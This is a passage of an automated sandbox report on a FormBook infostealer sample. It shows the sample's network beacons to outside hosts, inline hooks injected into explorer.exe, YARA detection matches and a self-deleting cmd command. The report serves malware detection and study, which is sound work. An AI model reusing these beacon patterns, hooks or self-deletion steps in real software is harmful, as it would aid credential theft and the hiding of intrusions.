                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 35 61 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 79 62 61 62 79 74 65 6e 6e 69 73 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 79 62 61 62 79 74 65 6e 6e 69 73 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 79 62 61 62 79 74 65 6e 6e 69 73 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 61 44 4e 48 55 6d 68 36 51 30 4a 5a 63 7a 68 73 57 55 46 31 56 57 4e 4d 61 46 42 50 61 6a 52 74 53 58 64 5a 4e 55 31 52 4d 57 78 58 54 69 39 69 61 33 5a 79 4b 30 78 54 59 32 51 77 5a 30 5a 71 62 45 74 69 65 53 74 50 65 6b 78 5a 4e 6d 74 4c 52 33 4a 32 63 56 45 7a 65 6b 46 68 4f 45 4a 35 51 6b 56 6c 52 33 4a 49 63 47 4e 48 53 7a 42 46 65 45 68 6b 4f 46 68 4b 59 58 52 35 4d 48 52 42 53 69 74 49 54 55 52 77 55 6c 46 74 61 6d 38 39 26 62 3d 22 2b 61 62 70 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 6d 67 6c 6f 67 29 3b 69 66 28 74
                                        Data Ascii: 5afe<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.mybabytennis.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.mybabytennis.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://www.mybabytennis.com/sk-logabpstatus.php?a=aDNHUmh6Q0JZczhsWUF1VWNMaFBPajRtSXdZNU1RMWxXTi9ia3ZyK0xTY2QwZ0ZqbEtieStPekxZNmtLR3J2cVEzekFhOEJ5QkVlR3JIcGNHSzBFeEhkOFhKYXR5MHRBSitITURwUlFtam89&b="+abp;document.body.appendChild(imglog);if(t


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.34974452.58.78.1680C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 22, 2021 08:46:55.672247887 CEST7301OUTGET /sm3l/?y0DdGli=yq5bXiAgrpTP0Cl4DWGobHu0GmgEguW+SJypzbO1DFimS8AGhR5rfP7J/muem3koPRQw&ixo0sr=dFQtk HTTP/1.1
                                        Host: www.sarahcarver.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jul 22, 2021 08:46:55.714467049 CEST7301INHTTP/1.1 410 Gone
                                        Server: openresty
                                        Date: Thu, 22 Jul 2021 06:45:10 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 66 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 73 61 72 61 68 63 61 72 76 65 72 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 62 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 73 61 72 61 68 63 61 72 76 65 72 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 7<html>9 <head>4f <meta http-equiv='refresh' content='5; url=http://www.sarahcarver.com/' />a </head>9 <body>3b You are being redirected to http://www.sarahcarver.coma </body>8</html>0


                                        Code Manipulations

                                        User Modules

                                        Hook Summary

                                        Function NameHook TypeActive in Processes
                                        PeekMessageAINLINEexplorer.exe
                                        PeekMessageWINLINEexplorer.exe
                                        GetMessageWINLINEexplorer.exe
                                        GetMessageAINLINEexplorer.exe

                                        Processes

                                        Process: explorer.exe, Module: user32.dll
                                        Function NameHook TypeNew Data
                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x80 0x0E 0xEE
                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x88 0x8E 0xEE
                                        GetMessageWINLINE0x48 0x8B 0xB8 0x88 0x8E 0xEE
                                        GetMessageAINLINE0x48 0x8B 0xB8 0x80 0x0E 0xEE

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Start time:08:44:58
                                        Start date:22/07/2021
                                        Path:C:\Users\user\Desktop\mal.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\mal.exe'
                                        Imagebase:0x650000
                                        File size:605696 bytes
                                        MD5 hash:B9BCA038D7532EC8A1A9BA0E867061BC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:low

                                        General

                                        Start time:08:45:17
                                        Start date:22/07/2021
                                        Path:C:\Users\user\Desktop\mal.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\mal.exe
                                        Imagebase:0xa80000
                                        File size:605696 bytes
                                        MD5 hash:B9BCA038D7532EC8A1A9BA0E867061BC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:08:45:24
                                        Start date:22/07/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff714890000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        General

                                        Start time:08:45:43
                                        Start date:22/07/2021
                                        Path:C:\Windows\SysWOW64\control.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\control.exe
                                        Imagebase:0x110000
                                        File size:114688 bytes
                                        MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        General

                                        Start time:08:45:48
                                        Start date:22/07/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del 'C:\Users\user\Desktop\mal.exe'
                                        Imagebase:0xbd0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:08:45:48
                                        Start date:22/07/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6b2800000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis

                                        Reset < >